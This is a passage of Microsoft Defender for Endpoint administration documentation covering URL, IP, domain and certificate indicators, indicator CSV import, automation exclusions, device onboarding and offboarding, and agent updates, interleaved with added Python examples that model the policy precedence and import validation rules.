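    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def classify_connections(network_events: List[Dict[str, str]],
                         alert_events: List[Dict[str, str]],
                         window_seconds: int = 60) -> List[Dict[str, str]]:
    """Attach a Verdict to every ConnectionSuccess event.

    'blocked' means an alert for the same device and remote URL was raised
    within window_seconds after the TCP event; otherwise 'unconfirmed',
    because a ConnectionSuccess alone does not prove the site was reachable.
    """
    window = timedelta(seconds=window_seconds)
    labelled = []
    for event in network_events:
        if event["ActionType"] != "ConnectionSuccess":
            continue  # only the misleading success events need reconciling
        started = _parse_ts(event["Timestamp"])
        has_alert = any(
            alert["DeviceId"] == event["DeviceId"]
            and alert["RemoteUrl"] == event["RemoteUrl"]
            and started <= _parse_ts(alert["Timestamp"]) <= started + window
            for alert in alert_events
        )
        labelled.append({**event, "Verdict": "blocked" if has_alert else "unconfirmed"})
    return labelled


def blocked_destinations(labelled: List[Dict[str, str]]) -> List[str]:
    """Distinct remote URLs whose ConnectionSuccess was actually a block."""
    return sorted({e["RemoteUrl"] for e in labelled if e["Verdict"] == "blocked"})


if __name__ == "__main__":
    for row in classify_connections(NETWORK_EVENTS, ALERT_EVENTS):
        print(row["DeviceId"], row["RemoteUrl"], row["ActionType"], "->", row["Verdict"])
```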

Warn mode controls

When using warn mode, you can configure the following controls:

Bypass ability
    Allow button in Edge
    Allow button on toast (Non-Microsoft browsers)
    Bypass duration parameter on the indicator
    Bypass enforcement across Microsoft and Non-Microsoft browsers

Redirect URL
    Redirect URL parameter on the indicator
    Redirect URL in Edge
    Redirect URL on toast (Non-Microsoft browsers)

For more information, see Govern apps discovered by Microsoft Defender for Endpoint.

IoC IP, URL, and domain policy conflict handling order

Policy conflict handling for domains/URLs/IP addresses differs from policy conflict
handling for certificates.
In the case where multiple different action types are set on the same indicator (for
example, block, warn, and allow action types set for Microsoft.com), the order in which
those action types take effect is:

1. Allow
2. Warn
3. Block

Allow overrides warn which overrides block: Allow > Warn > Block. Therefore, in the
above example, Microsoft.com would be allowed.

Defender for Cloud Apps Indicators


If your organization has enabled integration between Defender for Endpoint and
Defender for Cloud Apps, block indicators will be created in Defender for Endpoint for
all unsanctioned cloud applications. If an application is put in monitor mode, warn
indicators (bypassable block) will be created for the URLs associated with the
application. Allow indicators cannot be created for sanctioned applications at this time.
Indicators created by Defender for Cloud Apps follow the same policy conflict handling
described in the previous section.

Policy precedence
Microsoft Defender for Endpoint policy has precedence over Microsoft Defender
Antivirus policy. In situations when Defender for Endpoint is set to Allow, but Microsoft
Defender Antivirus is set to Block, the policy will default to Allow.

Precedence for multiple active policies


Applying multiple different web content filtering policies to the same device will result in
the more restrictive policy applying for each category. Consider the following scenario:

Policy 1 blocks categories 1 and 2 and audits the rest
Policy 2 blocks categories 3 and 4 and audits the rest

The result is that categories 1-4 are all blocked. This is illustrated in the following image.

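The precedence rules in this article (the longer URL indicator path wins, Allow > Warn > Block for conflicting action types, Defender for Endpoint policy over Defender Antivirus policy, and the more restrictive web content filtering setting per category) modelled as an added example; this is not Microsoft code. Exact host matching for domain indicators and treating Block as more restrictive than Audit are assumptions.

```python
"""Precedence rules for IP/URL/domain indicators, modelled in Python.

Added example, not Microsoft code. Assumptions: exact host match for domain
indicators, Block counts as more restrictive than Audit for web content
filtering, and conflicting action types resolve as Allow > Warn > Block.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

ACTION_RANK = {"Allow": 0, "Warn": 1, "Block": 2}  # lower rank wins a conflict
RESTRICTIVENESS = {"Audit": 0, "Block": 1}         # higher wins per category


@dataclass(frozen=True)
class Indicator:
    value: str   # single IP, domain, or URL (CIDR blocks are not supported)
    action: str  # "Allow", "Warn", or "Block"


def _host_and_path(value: str) -> Tuple[str, str]:
    """Split an indicator or URL into (host, path) without a trailing slash."""
    parts = urlsplit(value if "://" in value else "https://" + value)
    return parts.netloc.lower(), parts.path.rstrip("/")


def matching_indicators(url: str, indicators: List[Indicator]) -> List[Indicator]:
    """Indicators that apply to url: same host, path prefix, longest path wins.

    Every indicator sharing the longest matching path is returned so that
    resolve_action can arbitrate between their action types.
    """
    host, path = _host_and_path(url)
    best: List[Indicator] = []
    best_len = -1
    for ind in indicators:
        ind_host, ind_path = _host_and_path(ind.value)
        if ind_host != host:
            continue
        # Whole path segments only: /office covers /office/word, not /officex.
        if path != ind_path and not path.startswith(ind_path + "/"):
            continue
        if len(ind_path) > best_len:
            best, best_len = [ind], len(ind_path)
        elif len(ind_path) == best_len:
            best.append(ind)
    return best


def resolve_action(matches: List[Indicator]) -> Optional[str]:
    """Allow overrides Warn, which overrides Block; None when nothing matched."""
    if not matches:
        return None
    return min((m.action for m in matches), key=ACTION_RANK.__getitem__)


def effective_action(mde_action: Optional[str], av_action: Optional[str]) -> Optional[str]:
    """Defender for Endpoint policy takes precedence over Defender Antivirus policy."""
    return mde_action if mde_action is not None else av_action


def merge_web_filtering(policies: List[Dict[str, str]]) -> Dict[str, str]:
    """Several web content filtering policies: most restrictive setting per category."""
    merged: Dict[str, str] = {}
    for policy in policies:
        for category, setting in policy.items():
            current = merged.get(category)
            if current is None or RESTRICTIVENESS[setting] > RESTRICTIVENESS[current]:
                merged[category] = setting
    return merged


# Constructed indicator set: the article's support.microsoft.com example plus
# three conflicting action types on microsoft.com.
INDICATORS = [
    Indicator("https://support.microsoft.com", "Block"),
    Indicator("https://support.microsoft.com/office", "Allow"),
    Indicator("microsoft.com", "Block"),
    Indicator("microsoft.com", "Warn"),
    Indicator("microsoft.com", "Allow"),
]
# Constructed policies from the article's scenario: categories 1-4 end up blocked.
POLICY_1 = {"1": "Block", "2": "Block", "3": "Audit", "4": "Audit"}
POLICY_2 = {"1": "Audit", "2": "Audit", "3": "Block", "4": "Block"}


def verdict(url: str) -> Optional[str]:
    """Action that would apply to url under INDICATORS."""
    return resolve_action(matching_indicators(url, INDICATORS))


if __name__ == "__main__":
    for u in ("https://support.microsoft.com/office/word",
              "https://support.microsoft.com/windows", "https://microsoft.com/"):
        print(u, "->", verdict(u))
    print("MDE Allow vs AV Block ->", effective_action("Allow", "Block"))
    print("Web filtering ->", merge_web_filtering([POLICY_1, POLICY_2]))
```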
Create an indicator for IPs, URLs, or domains from the settings page
1. In the navigation pane, select Settings > Endpoints > Indicators (under Rules).

2. Select the IP addresses or URLs/Domains tab.

3. Select Add item.

4. Specify the following details:

Indicator - Specify the entity details and define the expiration of the indicator.
Action - Specify the action to be taken and provide a description.
Scope - Define the scope of the machine group.

5. Review the details in the Summary tab, then select Save.

Note
There may be up to 2 hours of latency between the time a policy is created and the
URL or IP being blocked on the device.

Related articles
Create indicators
Create indicators for files
Create indicators based on certificates
Manage indicators
Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus



Create indicators based on certificates
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

You can create indicators for certificates. Some common use cases include:

Scenarios when you need to deploy blocking technologies, such as attack surface
reduction rules and controlled folder access, but need to allow behaviors from
signed applications by adding the certificate to the allow list.
Blocking the use of a specific signed application across your organization. By
creating an indicator to block the certificate of the application, Windows Defender
AV will prevent file executions (block and remediate), and Automated
Investigation and Remediation behaves the same way.

Before you begin


It's important to understand the following requirements prior to creating indicators for
certificates:

This feature is available if your organization uses Microsoft Defender Antivirus and
Cloud-based protection is enabled. For more information, see Manage cloud-
based protection.

The Antimalware client version must be 4.18.1901.x or later.

Supported on machines on Windows 10, version 1703 or later, Windows Server
2019, Windows Server 2016, Windows Server 2012 R2, and Windows Server 2022.

Note

Windows Server 2016 and Windows Server 2012 R2 will need to be
onboarded using the instructions in Onboard Windows servers for this
feature to work.

The virus and threat protection definitions must be up to date.

This feature currently supports entering .CER or .PEM file extensions.

Important

A valid leaf certificate is a signing certificate that has a valid certification path
and must be chained to the Root Certificate Authority (CA) trusted by
Microsoft. Alternatively, a custom (self-signed) certificate can be used as long
as it's trusted by the client (Root CA certificate is installed under the Local
Machine 'Trusted Root Certification Authorities').
The children or parent of the allow/block certificate IoCs are not included in
the allow/block IoC functionality; only leaf certificates are supported.
Microsoft-signed certificates cannot be blocked.

Create an indicator for certificates from the settings page

Important

It can take up to 3 hours to create and remove a certificate IoC.

1. In the navigation pane, select Settings > Endpoints > Indicators (under Rules).

2. Select Add indicator.

3. Specify the following details:

Indicator - Specify the entity details and define the expiration of the indicator.
Action - Specify the action to be taken and provide a description.
Scope - Define the scope of the machine group.

4. Review the details in the Summary tab, then click Save.

Related articles
Create indicators
Create indicators for files
Create indicators for IPs and URLs/domains
Manage indicators
Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus



Manage indicators
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

1. In the navigation pane, select Settings > Endpoints > Indicators (under Rules).

2. Select the tab of the entity type you'd like to manage.

3. Update the details of the indicator and select Save or select the Delete button if
you'd like to remove the entity from the list.

Import a list of IoCs


You can also choose to upload a CSV file that defines the attributes of indicators, the
action to be taken, and other details.

Download the sample CSV to know the supported column attributes.

1. In the navigation pane, select Settings > Endpoints > Indicators (under Rules).

2. Select the tab of the entity type you'd like to import indicators for.

3. Select Import > Choose file.

4. Select Import. Repeat for all the files you'd like to import.

5. Select Done.

Note

Only 500 indicators can be uploaded for each batch.

Attempting to import indicators with specific categories requires the string to be
written in Pascal case convention and only accepts the category list available at the
portal.
The following table shows the supported parameters.

Parameter           Type            Description

indicatorType       Enum            Type of the indicator. Possible values are: FileSha1,
                                    FileSha256, IpAddress, DomainName, and Url. Required

indicatorValue      String          Identity of the Indicator entity. Required

action              Enum            The action that is taken if the indicator is discovered in
                                    the organization. Possible values are: Allowed, Audit,
                                    BlockAndRemediate, Warn, and Block. Required

title               String          Indicator alert title. Required

description         String          Description of the indicator. Required

expirationTime      DateTimeOffset  The expiration time of the indicator in the following
                                    format: YYYY-MM-DDTHH:MM:SS.0Z. The indicator gets
                                    deleted if the expiration time passes, and whatever
                                    happens at the expiration time occurs at the seconds
                                    (SS) value. Optional

severity            Enum            The severity of the indicator. Possible values are:
                                    Informational, Low, Medium, and High. Optional

recommendedActions  String          TI indicator alert recommended actions. Optional

rbacGroups          String          Comma-separated list of RBAC groups the indicator
                                    would be applied to. Optional

category            String          Category of the alert. Examples include: Execution and
                                    credential access. Optional

mitretechniques     String          MITRE technique codes/IDs (comma-separated). For
                                    more information, see Enterprise tactics. Optional.
                                    It's recommended to add a value in category when a
                                    MITRE technique is specified.

GenerateAlert       String          Whether the alert should be generated. Possible values
                                    are: True or False. Optional

Note

Classless Inter-Domain Routing (CIDR) notation for IP addresses is not supported.

For more information, see Microsoft Defender for Endpoint alert categories are
now aligned with MITRE ATT&CK!.
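An added example (not Microsoft code) that validates rows against the rules in the table and note above and splits them into 500-row CSV batches; it assumes the CSV column headers are the parameter names from the table, and the rows are constructed.

```python
"""Validate and batch an indicator import CSV for the Indicators page.

Added example, not Microsoft code. Column names follow the parameter table
above and are assumed to match the portal's sample CSV; the checks are the
ones the article states (enum values, single IP addresses, the expiration
format, Pascal-case categories, 500 indicators per batch). Rows are constructed.
"""
import csv
import io
import ipaddress
import re
from datetime import datetime, timezone
from typing import Dict, List

COLUMNS = ["indicatorType", "indicatorValue", "action", "title", "description",
           "expirationTime", "severity", "recommendedActions", "rbacGroups",
           "category", "mitretechniques", "GenerateAlert"]
INDICATOR_TYPES = {"FileSha1", "FileSha256", "IpAddress", "DomainName", "Url"}
ACTIONS = {"Allowed", "Audit", "BlockAndRemediate", "Warn", "Block"}
SEVERITIES = {"Informational", "Low", "Medium", "High"}
EXPIRATION_RE = re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.0Z$")
PASCAL_RE = re.compile(r"^[A-Z][A-Za-z0-9]*$")  # the portal's category list is authoritative
MAX_BATCH = 500  # only 500 indicators can be uploaded per batch


def format_expiration(when: datetime) -> str:
    """Render an aware datetime as YYYY-MM-DDTHH:MM:SS.0Z (UTC)."""
    return when.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.0Z")


def validate_row(row: Dict[str, str]) -> List[str]:
    """Return the problems found in one row; an empty list means importable."""
    errors: List[str] = []
    itype, value = row.get("indicatorType", ""), row.get("indicatorValue", "")
    if itype not in INDICATOR_TYPES:
        errors.append(f"indicatorType {itype!r} is not supported")
    if not value:
        errors.append("indicatorValue is required")
    elif itype == "IpAddress":
        try:  # CIDR blocks and ranges are rejected: one address per indicator
            ipaddress.ip_address(value)
        except ValueError:
            errors.append(f"indicatorValue {value!r} is not a single IP address")
    if row.get("action") not in ACTIONS:
        errors.append(f"action {row.get('action')!r} is not supported")
    for required in ("title", "description"):
        if not row.get(required):
            errors.append(f"{required} is required")
    if row.get("expirationTime") and not EXPIRATION_RE.match(row["expirationTime"]):
        errors.append("expirationTime must be YYYY-MM-DDTHH:MM:SS.0Z")
    if row.get("severity") and row["severity"] not in SEVERITIES:
        errors.append(f"severity {row['severity']!r} is not supported")
    if row.get("category") and not PASCAL_RE.match(row["category"]):
        errors.append("category must be written in Pascal case")
    if row.get("GenerateAlert") and row["GenerateAlert"] not in {"True", "False"}:
        errors.append("GenerateAlert must be True or False")
    return errors


def build_batches(rows: List[Dict[str, str]]) -> List[str]:
    """Split validated rows into CSV documents of at most MAX_BATCH rows each."""
    problems = {i: validate_row(r) for i, r in enumerate(rows)}
    problems = {i: e for i, e in problems.items() if e}
    if problems:
        raise ValueError(f"rows rejected: {problems}")
    batches = []
    for start in range(0, len(rows), MAX_BATCH):
        buffer = io.StringIO()
        writer = csv.DictWriter(buffer, fieldnames=COLUMNS, lineterminator="\n")
        writer.writeheader()
        for row in rows[start:start + MAX_BATCH]:
            writer.writerow({column: row.get(column, "") for column in COLUMNS})
        batches.append(buffer.getvalue())
    return batches


# Constructed rows; 203.0.113.0/24 is a documentation range (RFC 5737).
EXPIRES = format_expiration(datetime(2024, 12, 31, 23, 59, 59, tzinfo=timezone.utc))
SAMPLE_ROWS = [
    {"indicatorType": "Url", "indicatorValue": "https://lure.example/login",
     "action": "Warn", "title": "Phishing lure page (constructed)",
     "description": "Warn users who open the lure page", "expirationTime": EXPIRES,
     "severity": "Medium", "category": "CredentialAccess",
     "mitretechniques": "T1566", "GenerateAlert": "True"},
    {"indicatorType": "IpAddress", "indicatorValue": "203.0.113.5",
     "action": "Block", "title": "Known bad address (constructed)",
     "description": "Block a single external IP", "GenerateAlert": "True"},
]
CIDR_ROW = {"indicatorType": "IpAddress", "indicatorValue": "203.0.113.0/24",
            "action": "Block", "title": "Range (constructed)",
            "description": "Rejected: CIDR notation is not supported"}

if __name__ == "__main__":
    print("CIDR row problems:", validate_row(CIDR_ROW))
    print(build_batches(SAMPLE_ROWS)[0])
```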
Watch this video to learn how Microsoft Defender for Endpoint provides multiple ways
to add and manage Indicators of compromise (IoCs).
https://www.microsoft.com/en-us/videoplayer/embed/RE4qLVw?postJsllMsg=true

See also
Create indicators
Create indicators for files
Create indicators for IPs and URLs/domains
Create indicators based on certificates
Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus



Manage automation file uploads
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Enable the content analysis capability so that certain files and email attachments can
automatically be uploaded to the cloud for additional inspection in Automated
investigation.

Microsoft uses various file investigation mechanisms to inspect and analyze files.

Identify the files and email attachments by specifying the file extension names and email
attachment extension names.

For example, if you add exe and bat as file or attachment extension names, then all files
or attachments with those extensions will automatically be sent to the cloud for
additional inspection during Automated investigation.

Note

Microsoft securely stores the files submitted for a six-month period. Files are
promptly deleted after six months.

Add file extension names and attachment extension names
1. Log in to Microsoft Defender XDR using an account with the Security
administrator or Global administrator role assigned.

2. In the navigation pane, select Settings > Endpoints > Rules > Automation
uploads.

3. Toggle the content analysis setting between On and Off.

4. Configure the following extension names and separate extension names with a
comma:

File extension names - Suspicious files except email attachments will be
submitted for additional inspection

Related topics
Manage automation folder exclusions



Manage automation folder exclusions
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 2


Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Automation folder exclusions allow you to specify folders that the Automated
investigation will skip.

You can control the following attributes about the folder that you'd like to be skipped:

Folders: You can specify a folder and its subfolders to be skipped.

Note

At this time, use of wild cards as a way to exclude files under a directory is not
yet supported.

Extensions of the files: You can specify the extensions to exclude in a specific
directory. The extensions are a way to prevent an attacker from using an excluded
folder to hide an exploit. The extensions explicitly define which files to ignore.

File names: You can specify the file names that you want to be excluded in a
specific directory. The names are a way to prevent an attacker from using an
excluded folder to hide an exploit. The names explicitly define which files to ignore.

Add an automation folder exclusion


1. Log in to Microsoft Defender XDR using an account with the Security
administrator or Global administrator role assigned.

2. In the navigation pane, select Settings > Endpoints > Rules > Automation folder
exclusions.

3. Click New folder exclusion.

4. Enter the folder details:

Folder
Extensions
File names
Description

5. Click Save.

Note

Live Response commands to collect or examine excluded files will fail with error:
"File is excluded". In addition, automated investigations will ignore the excluded
items.

Edit an automation folder exclusion


1. In the navigation pane, select Settings > Endpoints > Rules > Automation folder
exclusions.
2. Click Edit on the folder exclusion.
3. Update the details of the rule and click Save.

Remove an automation folder exclusion


1. In the navigation pane, select Settings > Endpoints > Rules > Automation folder
exclusions.
2. Click Remove exclusion.

Related articles
Manage automation allowed/blocked lists
Manage automation file uploads
Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus



Onboard to Microsoft Defender for Endpoint
Article • 07/10/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Onboard devices using any of the supported management tools
The deployment tool you use influences how you onboard endpoints to the service.

To start onboarding your devices:

1. Go to Select deployment method.
2. Choose the Operating System for the devices you wish to Onboard.
3. Select the tool you plan to use.
4. Follow the instructions to Onboard your devices.

This video provides a quick overview of the onboarding process and the different tools
and methods.
https://www.microsoft.com/en-us/videoplayer/embed/RE4bGqr?postJsllMsg=true

Deploy using a ring-based approach

New deployments
A ring-based approach is a method of identifying a set of endpoints to onboard and
verifying that certain criteria are met before proceeding to deploy the service to a larger
set of devices. You can define the exit criteria for each ring and ensure that they're
satisfied before moving on to the next ring. Adopting a ring-based deployment helps
reduce potential issues that could arise while rolling out the service.
This table provides an example of the deployment rings you might use:

Deployment ring   Description

Evaluate          Ring 1: Identify 50 devices to onboard to the service for testing.

Pilot             Ring 2: Identify and onboard the next 50-100 endpoints in a production
                  environment. Microsoft Defender for Endpoint supports various endpoints that
                  you can onboard to the service, for more information, see Select deployment
                  method.

Full deployment   Ring 3: Roll out service to the rest of environment in larger increments. For more
                  information, see Get started with your Microsoft Defender for Endpoint
                  deployment.

Exit criteria
An example set of exit criteria for each ring can include:

Devices show up in the device inventory list
Alerts appear in dashboard
Run a detection test
Run a simulated attack on a device

Existing deployments

Windows endpoints
For Windows and/or Windows Servers, you select several machines to test ahead of time
(before patch Tuesday) by using the Security Update Validation program (SUVP).

For more information, see:

What is the Security Update Validation Program
Software Update Validation Program and Microsoft Malware Protection Center
Establishment - TwC Interactive Timeline Part 4

Non-Windows endpoints
With macOS and Linux, you could take a couple of systems and run in the Beta channel.
Note

Ideally at least one security admin and one developer so that you are able to find
compatibility, performance and reliability issues before the build makes it into the
Current channel.

The choice of the channel determines the type and frequency of updates that are
offered to your device. Devices in Beta are the first ones to receive updates and new
features, followed later by Preview and lastly by Current.

In order to preview new features and provide early feedback, it's recommended that you
configure some devices in your enterprise to use either Beta or Preview.

Warning

Switching the channel after the initial installation requires the product to be
reinstalled. To switch the product channel: uninstall the existing package, re-
configure your device to use the new channel, and follow the steps in this
document to install the package from the new location.

Example deployments
To provide some guidance on your deployments, in this section we'll guide you through
using two deployment tools to onboard endpoints.

The tools in the example deployments are:

Onboarding using Microsoft Configuration Manager
Onboarding using Microsoft Intune

For some additional information and guidance, check out the PDF or Visio to see
the various paths for deploying Defender for Endpoint.

The example deployments will guide you on configuring some of the Defender for
Endpoint capabilities, but you'll find more detailed information on configuring Defender
for Endpoint capabilities in the next step.

Next step
After onboarding the endpoints move on to the next step where you'll configure the
various capabilities such as endpoint detection and response, next-generation
protection, and attack surface reduction.

Step 5 - Configure capabilities



Offboard devices
Article • 08/01/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Platforms

macOS
Linux
Windows Server 2012 R2
Windows Server 2016

Want to experience Defender for Endpoint? Sign up for a free trial.

Follow the corresponding instructions depending on your preferred deployment method.

Note

The status of a device will be switched to Inactive 7 days after offboarding.

Offboarded devices' data (such as Timeline, Alerts, Vulnerabilities, etc.) will remain
in the portal until the configured retention period expires.

The device's profile (without data) will remain in the Devices List for no longer than
180 days.

In addition, devices that are not active in the last 30 days are not factored in on the
data that reflects your organization's Defender Vulnerability Management exposure
score and Microsoft Secure Score for Devices.

To view only active devices, you can filter by sensor health state, device tags or
machine groups.

Offboard Windows devices


Offboard devices using a local script
Offboard devices using Group Policy
Offboard devices using Mobile Device Management tools

Offboard Servers
Offboard servers

Offboard non-Windows devices


Offboard non-Windows devices



Ensure your devices are configured properly
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

With properly configured devices, you can boost overall resilience against threats and
enhance your capability to detect and respond to attacks. Security configuration
management helps ensure that your devices:

Onboard to Microsoft Defender for Endpoint
Meet or exceed the Defender for Endpoint security baseline configuration
Have strategic attack surface mitigations in place

Click Configuration management from the navigation menu to open the Device
configuration management page.

Device configuration management page


You can track configuration status at an organizational level and quickly take action in
response to poor onboarding coverage, compliance issues, and poorly optimized attack
surface mitigations through direct, deep links to device management pages on
Microsoft Intune and Microsoft Defender portal .

In doing so, you benefit from:

Comprehensive visibility of the events on your devices
Robust threat intelligence and powerful device learning technologies for
processing raw events and identifying the breach activity and threat indicators
A full stack of security features configured to efficiently stop the installation of
malicious implants, hijacking of system files and processes, data exfiltration, and
other threat activities
Optimized attack surface mitigations, maximizing strategic defenses against threat
activity while minimizing impact to productivity

Enroll devices to Intune management


Device configuration management works closely with Intune device management to
establish the inventory of the devices in your organization and the baseline security
configuration. You will be able to track and manage configuration issues on Intune-
managed Windows devices.

Before you can ensure your devices are configured properly, enroll them to Intune
management. Intune enrollment is robust and has several enrollment options for
Windows devices. For more information about Intune enrollment options, read about
setting up enrollment for Windows devices.

Note

To enroll Windows devices to Intune, administrators must have already been
assigned licenses. Read about assigning licenses for device enrollment.

Tip

To optimize device management through Intune, connect Intune to Defender for
Endpoint.

Obtain required permissions


By default, only users who have been assigned the Global Administrator or the Intune
Service Administrator role on Microsoft Entra ID can manage and assign the device
configuration profiles needed for onboarding devices and deploying the security
baseline.

If you have been assigned other roles, ensure you have the necessary permissions:

Full permissions to device configurations
Full permissions to security baselines
Read permissions to device compliance policies
Read permissions to the organization

Device configuration permissions on Intune

 Tip

To learn more about assigning permissions on Intune, read about creating custom
roles.

In this section
Topic                                    Description

Get devices onboarded to Defender        Track onboarding status of Intune-managed devices and
for Endpoint                             onboard more devices through Intune.

Increase compliance to the Defender      Track baseline compliance and noncompliance. Deploy the
for Endpoint security baseline           security baseline to more Intune-managed devices.

Optimize ASR rule deployment and         Review rule deployment and tweak detections using
detections                               impact analysis tools in Microsoft Defender portal.
Want to experience Defender for Endpoint? Sign up for a free trial.



Get devices onboarded to Microsoft Defender for Endpoint
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Each onboarded device adds an additional endpoint detection and response (EDR)
sensor and increases visibility over breach activity in your network. Onboarding also
ensures that a device can be checked for vulnerable components as well security
configuration issues and can receive critical remediation actions during attacks.

Before you can track and manage onboarding of devices:

Enroll your devices to Intune management
Ensure you have the necessary permissions

Watch this video to learn how to easily onboard clients with Microsoft Defender for
Endpoint.
https://www.microsoft.com/en-us/videoplayer/embed/RE4bGqr?rel=0&postJsllMsg=true

Discover and track unprotected devices


The Onboarding card provides a high-level overview of your onboarding rate by
comparing the number of Windows devices that have actually onboarded to Defender
for Endpoint against the total number of Intune-managed Windows devices.

Card showing onboarded devices compared to the total number of Intune-managed
Windows devices

Note

If you used Configuration Manager, the onboarding script, or other onboarding
methods that don't use Intune profiles, you might encounter data discrepancies. To
resolve these discrepancies, create a corresponding Intune configuration profile for
Defender for Endpoint onboarding and assign that profile to your devices.

Onboard more devices with Intune profiles


Defender for Endpoint provides several convenient options for onboarding Windows
devices. For Intune-managed devices, however, you can leverage Intune profiles to
conveniently deploy the Defender for Endpoint sensor to select devices, effectively
onboarding these devices to the service.

From the Onboarding card, select Onboard more devices to create and assign a profile
on Intune. The link takes you to the device compliance page on Intune, which provides a
similar overview of your onboarding state.

Microsoft Defender for Endpoint device compliance page on Intune device management

Tip

Alternatively, you can navigate to the Defender for Endpoint onboarding
compliance page in the Microsoft Azure portal from All services > Intune >
Device compliance > Microsoft Defender ATP.

Note

If you want to view the most up-to-date device data, click on List of devices
without ATP sensor.

From the device compliance page, create a configuration profile specifically for the
deployment of the Defender for Endpoint sensor and assign that profile to the devices
you want to onboard. To do this, you can either:

Select Create a device configuration profile to configure ATP sensor to start with
a predefined device configuration profile.
Create the device configuration profile from scratch.

For more information, read about using Intune device configuration profiles to onboard
devices to Defender for Endpoint.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Related topics
Ensure your devices are configured properly
Increase compliance to the Defender for Endpoint security baseline
Optimize ASR rule deployment and detections



Updating MMA on Windows devices for Microsoft Defender for Endpoint
Article • 10/05/2023

Important

If you've arrived on this page as a result of clicking on a notification at the
Microsoft Defender portal (https://security.microsoft.com), you have devices in
your environment with outdated agents, and you need to take action (described in
this article) to avoid service disruption. For more details, please reference message
center post MC598631 (requires access to Message Center).

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

If you're using the Microsoft Monitoring Agent (MMA) on Windows devices, it's
important to keep this agent updated. For Windows Server 2012 R2 and Windows
Server 2016, Microsoft recommends upgrading to the new, unified agent for Defender
for Endpoint. This article describes how to:

Update the MMA on your devices (for devices running Windows 7 SP1 Enterprise,
Windows 7 SP1 Pro, Windows 8.1 Pro, Windows 8.1 Enterprise, and Windows
Server 2008 R2 SP1).
Upgrade to the new, unified agent for Defender for Endpoint (for devices
running Windows Server 2012 R2 and Windows Server 2016).

Update MMA on your devices

This option applies to devices running Windows 7 SP1 Enterprise, Windows 7 SP1 Pro,
Windows 8.1 Pro, Windows 8.1 Enterprise, and Windows Server 2008 R2 SP1.

To help you identify older versions of the MMA inside of your organization, you
can use the "EOSDate" column in advanced hunting. Or, follow the instructions in
Plan for end-of-support software and software versions to use the vulnerability
management feature inside of Microsoft Defender for Endpoint to track
remediation.
See Manage and maintain the Log Analytics agent for Windows and Linux for
instructions on how to upgrade the agent using Azure Automation or a command-
line approach to use with various deployment tools and methods.

Update MMA by using Microsoft Update, through Windows Server Update
Services or Configuration Manager. Use the method that was configured when
MMA was first installed on the device.

Download the MMA setup file:

Windows 64-bit agent: https://go.microsoft.com/fwlink/?LinkId=828603
Windows 32-bit agent: https://go.microsoft.com/fwlink/?LinkId=828604

Upgrade to the new, unified agent for Defender for Endpoint

This option applies to servers running Windows Server 2012 R2 and Windows Server 2016.

A new agent was released in April 2022 for Windows Server 2012 R2 and Windows
Server 2016. The new agent doesn't depend on MMA. There are significant benefits to
moving to this new agent, such as a vastly extended feature set. To learn more, see Tech
Community Blog: Defending Windows Server 2012 R2 and 2016 .

Microsoft Defender Vulnerability Management provides an assessment (SCID-2030)
titled "Update Microsoft Defender for Endpoint core components" that
allows you to track which Windows Server 2012 R2 or Windows Server 2016
machines haven't been upgraded yet.

See Server migration scenarios from the previous, MMA-based Microsoft Defender
for Endpoint solution to understand your options for upgrading to the new agent.

If you're using Microsoft Endpoint Configuration Manager (SCCM/ConfigMgr) 2107
or later to manage your servers running Windows Server 2012 R2 or Windows
Server 2016, see Migrating servers from Microsoft Monitoring Agent to the unified
solution to perform an orchestrated upgrade.

If you're using Microsoft Endpoint Configuration Manager (SCCM/ConfigMgr) 2207
or later to manage your servers running Windows Server 2012 R2 or Windows
Server 2016, see Onboarding to Microsoft Defender for Endpoint with
Configuration Manager 2207 and later versions to perform an automated upgrade.

If you're using Microsoft Defender for Cloud with servers running Windows Server
2012 R2 or Windows Server 2016, you can automate the upgrade by selecting
Enable unified solution. See Users with Defender for Servers enabled and
Microsoft Defender for Endpoint deployed.

Important information about MMA

If you've determined that you aren't using the MMA for Defender for Endpoint, or
you've already updated your agent, no other steps are needed.

If you are, however, still using MMA for other purposes (such as Log Analytics),
MMA is currently set to retire in August 2024. See We're retiring the Log Analytics
agent in Azure Monitor on 31 August 2024. Depending on your particular
scenario, now might be a good time to upgrade to the Azure Monitor Agent (AMA), the
successor of MMA.

Important

Devices running Windows 7 SP1, Windows 8.1, or Windows Server 2008 R2 remain
dependent on MMA.

Devices running Windows Server 2012 R2 or Windows Server 2016 should be
upgraded to the new, unified solution so that they no longer require the use of
MMA.

